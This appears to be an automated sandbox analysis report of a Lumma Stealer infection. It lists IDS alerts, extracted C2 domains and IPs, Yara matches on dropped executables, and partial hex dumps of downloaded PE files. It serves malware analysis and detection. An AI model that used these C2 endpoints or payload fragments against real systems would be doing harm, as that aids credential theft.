Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50413 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50379 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50427 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50447 -> 172.67.180.113:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: lossekniyyt.click
Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	IPs: 185.215.113.43

Yara detected Generic Downloader

Source: Yara match	File source: 49.0.1fa18d372f.exe.e60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.1fa18d372f.exe.44d94e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe, type: DROPPED

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 09:10:09 GMTContent-Type: application/octet-streamContent-Length: 1801728Last-Modified: Thu, 19 Dec 2024 08:27:33 GMTConnection: keep-aliveETag: "6763d8f5-1b7e00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 b0 00 00 00 00 00 00 00 60 47 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 47 00 00 04 00 00 26 7b 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 05 00 00 04 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 29 00 00 40 05 00 00 02 00 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 72 61 78 68 6d 69 6e 00 00 19 00 00 50 2e 00 00 f8 18 00 00 60 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 68 72 75 69 77 75 74 00 10 00 00 00 50 47 00 00 04 00 00 00 58 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 47 00 00 22 00 00 00 5c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 09:10:18 GMTContent-Type: application/octet-streamContent-Length: 2928640Last-Modified: Thu, 19 Dec 2024 08:27:44 GMTConnection: keep-aliveETag: "6763d900-2cb000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 e0 4f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 50 00 00 04 00 00 52 61 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 61 73 73 71 6c 61 77 77 00 10 2b 00 00 c0 24 00 00 0e 2b 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6c 63 68 6c 6a 64 67 00 10 00 00 00 d0 4f 00 00 04 00 00 00 8a 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4f 00 00 22 00 00 00 8e 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 09:10:29 GMTContent-Type: application/octet-streamContent-Length: 967680Last-Modified: Thu, 19 Dec 2024 08:25:38 GMTConnection: keep-aliveETag: "6763d882-ec400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 73 d8 63 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 14 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 0f 00 00 04 00 00 6d 31 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 8c 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 8c 58 01 00 00 40 0d 00 00 5a 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 a0 0e 00 00 76 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 09:10:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 09:10:36 GMTContent-Type: application/octet-streamContent-Length: 1716736Last-Modified: Thu, 19 Dec 2024 08:26:05 GMTConnection: keep-aliveETag: "6763d89d-1a3200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 44 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 44 00 00 04 00 00 86 70 1a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 a0 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 69 75 76 75 72 73 66 00 e0 19 00 00 80 2a 00 00 d2 19 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 77 75 6a 77 65 75 76 00 20 00 00 00 60 44 00 00 04 00 00 00 0c 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 44 00 00 22 00 00 00 10 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 09:10:44 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 09:10:57 GMTContent-Type: application/octet-streamContent-Length: 3286016Last-Modified: Wed, 18 Dec 2024 13:43:08 GMTConnection: keep-aliveETag: "6762d16c-322400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 88 cf 56 f4 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 50 00 00 c8 2f 00 00 5a 02 00 00 00 00 00 ce e6 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 32 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 80 e6 2f 00 4b 00 00 00 00 00 30 00 40 57 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 32 00 0c 00 00 00 33 e6 2f 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 c6 2f 00 00 20 00 00 00 c8 2f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 40 57 02 00 00 00 30 00 00 58 02 00 00 ca 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 32 00 00 02 00 00 00 22 32 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 e6 2f 00 00 00 00 00 48 00 00 00 02 00 05 00 00 c2 01 00 40 1c 04 00 03 00 00 00 43 0d 00 06 40 de 05 00 7a 05 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 2b 05 28 42 0f 39 39 28 02 00 00 06 